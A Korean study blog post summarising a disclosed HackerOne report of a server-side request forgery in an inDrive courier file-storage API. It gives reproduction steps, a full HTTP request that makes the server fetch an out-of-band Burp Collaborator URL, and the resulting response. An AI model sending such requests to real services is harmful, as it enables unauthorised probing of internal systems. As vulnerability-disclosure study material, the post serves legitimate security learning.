본 포스팅은 학습 목적으로 작성되었으며, hackerone report를 기반으로 작성되었습니다.
분석 레포트
https://hackerone.com/reports/2300358
inDrive disclosed on HackerOne: SSRF in...
hackerone.com
Summary
https://couriers.indrive.com/api/file-storage 의 파라미터 url에 SSRF 취약점이 존재한다.
Steps to Reproduce
burp collaborator를 사용해 증명을 한다.
1. https://couriers.indrive.com/api/file-storage?url=http://va99zfc0lxpm75ogmcjhz8xij9pzdo.oastify.com 해당 요청을 보낸다. ( ?url= 본인의 burp collaborator로 변경 )
2. 응답에 표시되는 컨텐츠와 burp collaborator의 상호 작용을 확인한다.
Request
GET /api/file-storage?url=http://va99zfc0lxpm75ogmcjhz8xij9pzdo.oastify.com HTTP/2
Host: couriers.indrive.com
Sec-Ch-Ua: "Google Chrome";v="119", "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,ar;q=0.8
Response
HTTP/2 200 OK
Authorization: Bearer undefined
Content-Disposition: attachment; filename="file
Date: Sun, 31 Dec 2023 13:19:04 GMT
X-Envoy-Upstream-Service-Time: 678
Server: istio-envoy
X-Cache: Miss from cloudfront
Via: 1.1 33c6e91bdc193e34e8dcc80edc466018.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: MRS52-P2
X-Amz-Cf-Id: 9GuBZr1A03ZS0bEYUbDp80JZj8dNYCE4YoVUImLD5RU15dEM-vs5fQ==
<html><body>6zy5d1pwzab93qopx8jq2ezjigz</body></html>
Note
예를 들어, https://couriers.indrive.com/api/file-storage?url=https://www.google.com 같은 웹 사이트를 요청하면, 응답에 해당 HTML 컨텐츠가 표시된다.
Impact
URL 파라미터가 입력을 제대로 살균하지 않아, 공격자가 원하는 웹 사이트를 요청할 수 있다.
